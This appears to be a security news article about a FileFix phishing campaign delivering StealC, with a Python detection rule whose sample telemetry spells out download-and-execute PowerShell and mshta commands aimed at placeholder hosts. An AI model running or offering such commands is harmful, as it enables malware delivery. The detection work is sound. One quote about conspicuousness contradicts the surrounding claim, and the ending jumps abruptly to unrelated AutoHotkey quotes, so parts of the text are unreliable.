Cybersecurity researchers have flagged a new attack campaign that uses a variant of the FileFix social engineering technique to deliver the StealC information stealer malware.
“The campaign employs a convincingly designed, multilingual phishing website (such as a fake Facebook Security page) with advanced obfuscation and anti-analysis methods to avoid detection,” said Acronis security researcher Eliad Kimhy in a report provided to The Hacker News.
The attack chain uses FileFix to lure users into executing an initial payload, which then downloads seemingly harmless image files that carry embedded malicious code from a Bitbucket repository. Hosting the payload on a legitimate source code hosting platform lets the attackers borrow the trust that platform enjoys and evade detection.
First demonstrated by security researcher mrd0x as a proof-of-concept (PoC) in June 2025, FileFix differs from ClickFix in that it does not require users to open the Windows Run dialog and paste an obfuscated command under the guise of a fake CAPTCHA verification on a phishing page.
Instead, FileFix abuses a web browser’s file upload feature to trick users into pasting a command into the File Explorer’s address bar, where it is executed locally on the victim’s machine.
The attack begins with an email warning that the recipient’s Facebook account may be suspended for policy violations in shared posts or messages. The email redirects victims to a phishing site, where they are prompted to appeal the decision by clicking a button.
The phishing page is heavily obfuscated and employs techniques like junk code and fragmentation to impede analysis efforts.
Clicking the button triggers the FileFix step: the page tells the victim that a PDF copy of the alleged policy violation can be viewed by pasting a document path into the File Explorer’s address bar.
Although the path shown to the victim is harmless, a malicious command is silently copied to the clipboard when they click the button that opens File Explorer. That command is a multi-stage PowerShell script: it downloads the image, decodes the next-stage payload hidden inside it, and executes a Go-based loader that unpacks the shellcode which launches StealC.
FileFix has a notable advantage over ClickFix: it abuses a browser feature in everyday use rather than the Run dialog, which an administrator can disable through policy for exactly this reason.
“Unlike ClickFix, FileFix executes the payload through the victim’s web browser, making it more conspicuous in an investigation or to security solutions,” noted Acronis.
“The threat actor behind this attack has invested significantly in crafting the phishing infrastructure, payload delivery, and supporting elements to maximize evasion and impact.”
The script is designed to profile the compromised host and deliver additional payloads, including AnyDesk, TeamViewer, information stealers, and clipper malware.
The cybersecurity firm also identified other variants of the campaign in which victims are instructed to run an MSHTA command pointing to a look-alike Google domain (“wl.google-587262[.]com”) that fetches and executes a remote malicious script.
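Both execution paths described above (the PowerShell command pasted into the File Explorer address bar, and the MSHTA variant that pulls a remote script) leave the same kind of trace in endpoint telemetry: a script interpreter spawned by explorer.exe, or mshta.exe handed a URL. The following hunting rule is an added example written for this article, not code from Acronis or from the campaign. It runs over constructed Sysmon-style process-creation records; the field names, the sample command lines, the placeholder URLs and the whitespace-padding heuristic (which follows the public mrd0x PoC rather than anything this article states) are all assumptions.

```python
"""Hunting rule for FileFix-style execution in process-creation telemetry.

Added example for this article. Event shape and samples are constructed and do not
come from the Acronis report or from real campaign data.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields; assumed shape)."""
    parent_image: str
    image: str
    command_line: str


# Interpreters a FileFix lure can reach from the File Explorer address bar.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download/decode cues typical of the multi-stage PowerShell described in the article.
DOWNLOAD_CUES = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|frombase64string|"
    r"\biex\b|invoke-expression|https?://",
    re.IGNORECASE,
)

# Heuristic (assumption, based on the public mrd0x PoC, not on this article): a long run
# of spaces followed by a file path pushes the real command out of view in the address bar.
PADDED_PATH = re.compile(r" {20,}.*[A-Za-z]:\\")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\Windows\\explorer.exe' -> 'explorer.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a verdict label for one event, or None when the rule does not fire."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line
    # MSHTA variant: mshta.exe given a remote URL, regardless of parent process.
    if child == "mshta.exe" and re.search(r"https?://", cmd, re.IGNORECASE):
        return "mshta-remote-script"
    # FileFix hallmark: explorer.exe (the address bar) is the parent of the interpreter.
    if parent == "explorer.exe" and child in INTERPRETERS:
        if DOWNLOAD_CUES.search(cmd):
            return "filefix-addressbar-download"
        if PADDED_PATH.search(cmd):
            return "filefix-padded-commandline"
    return None


def triage(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (verdict, command line) pairs for every event the rule fires on."""
    return [(v, e.command_line) for e in events if (v := classify(e))]


# Constructed sample telemetry (not real campaign data; URLs are placeholders).
SAMPLE_EVENTS = [
    # 1. Address-bar PowerShell that fetches an image and executes bytes decoded from it.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"$b=(iwr 'https://bitbucket.example/team/repo/raw/photo.png').Content;"
              "iex([Text.Encoding]::UTF8.GetString($b[-4096..-1]))\""
              + " " * 60 + r"C:\Users\Public\PolicyViolation.pdf"),
    # 2. No download cue, but the command is hidden behind padding and a fake document path.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c ping beacon.example" + " " * 40 + r"# C:\docs\HRPolicy.docx"),
    # 3. MSHTA variant pointing at a look-alike domain (placeholder, not the article's IOC).
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://wl.example-lookalike.test/appeal"),
    # 4. Benign: a user simply opened PowerShell from the address bar.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # 5. Out of scope for this rule: download from a cmd.exe parent, not the address bar.
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c \"iwr https://updates.example/patch.ps1 | iex\""),
]

if __name__ == "__main__":
    for verdict, cmd in triage(SAMPLE_EVENTS):
        print(f"{verdict}: {cmd[:80]}")
```

The parent-process check is what separates FileFix from ordinary scripting: an interpreter launched from the address bar always has explorer.exe as its parent, so pair this rule with a Sysmon or EDR source that records the parent image reliably, and treat event 5 with a separate rule if you also want cmd.exe-spawned downloads.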
“AHK is a Windows-based scripting language originally intended for automating tasks like keystrokes and mouse clicks,” mentioned Doppel security researcher Aarsh Jawa.
“While AHK has been popular among power users and system administrators for its simplicity and flexibility, threat actors began weaponizing it around 2019 to create lightweight malware droppers and information stealers disguised as benign automation tools or support utilities.”